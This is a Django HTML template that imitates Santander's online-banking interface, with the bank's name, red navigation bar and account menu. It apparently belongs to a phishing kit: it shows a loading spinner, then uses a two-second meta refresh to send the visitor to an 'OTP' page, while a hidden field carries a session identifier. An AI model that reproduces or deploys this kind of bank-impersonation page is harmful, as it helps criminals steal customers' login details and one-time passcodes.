{% load static %}
{% block content %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta http-equiv="refresh" content="2;url={% url 'OTP' %}" />
<title>Santander</title>
    <link rel="icon" href="{% static 'styles/favicon.ico' %}" type="image/x-icon">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" type="text/css" href="{% static 'styles/santander.css' %}">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
<style type="text/css">
    .bs-example{
        margin: 20px;
    }
    
    
    .navbar-toggler:hover{
        
        background-color:#ec0000
        
        
    }
    
       a:hover{
        
        background-color:#ec0000
        
        
    }
    
    a{
        
        
        text-decoration:none !important;
        
        font-size:1rem !important;
        
        
    }
    
    input{
        
        border:1px solid #666;
        outline:none;
        box-shadow:none;
        border-radius:0px;
        border-style:solid;
        
    }
    input:focus{
        
        border:1px solid black !important;
        outline:none;
        box-shadow:none;
        border-radius:0px;
        border-style:solid;
        
    }


       .loader {
  border: 4px solid #ffe6e6;; /* Light grey */
  border-top: 4px solid #ef3131; /* Blue */
  border-radius: 50%;
  width: 65px;
  height: 65px;
  animation: spin .8s linear infinite;
  margin: 0 auto;
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
} 
</style>

</head>
<body style="background:white !important">
<div class="bs-example" style="width:100%;margin:0 auto !important">
    <nav class="navbar navbar-expand-md navbar-light bg-light" style="width:100%;margin:0 auto !important;background-color:#ec0000 !important;">
        <a href="#" class="navbar-brand" style="color:white"><img src="{% static 'styles/navbarimg.png' %}" width = "130px">  </a>
        <button type="button" onclick="window.location.href='https://www.santander.co.uk/logoff'" class="navbar-toggler" data-toggle="collapse" data-target="#navbarCollapse" style="outline:none;border:0px;background:#ec0000">
<span class="navbar-toggler" style="outline:none;border:0px">


<p style="color:white;font-size:smaller;position:relative;bottom:1.5rem">Log out</p>
        </button>

        <div class="collapse navbar" id="navbarCollapse" style="border:0px !important;outline:none !important">
            <div class="navbar-nav" style="background-color:#ec0000;border:0px !important;outline:none !important">
                <a href="#" class="nav-item nav-link" style="color:white !important">My Accounts & Transactions</a>
                <a href="#" class="nav-item nav-link active" style="color:white !important">Payments & Transfers</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Standing Orders</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Direct Debits</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Credit Cards</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Account Services</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">My Details & Settings</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Help & Contact Us</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Logout</a>
                
            </div>
           
        </div>
    </nav>
    
    <div class="form-group" style="margin: 0 auto !important;padding-left:5%">

    
    
       <div class="form-group" style="margin: 0 auto !important;padding-left:0%;width:85%">
        <br>
     
        <br> <br> <br>
            
      
        <div class="loader"></div> 
     
   

        

</div>
    
</div>
<input value="{{request.session.pid}}" id="pid" style="visibility: hidden;">
</body>

</html>

{% endblock %}
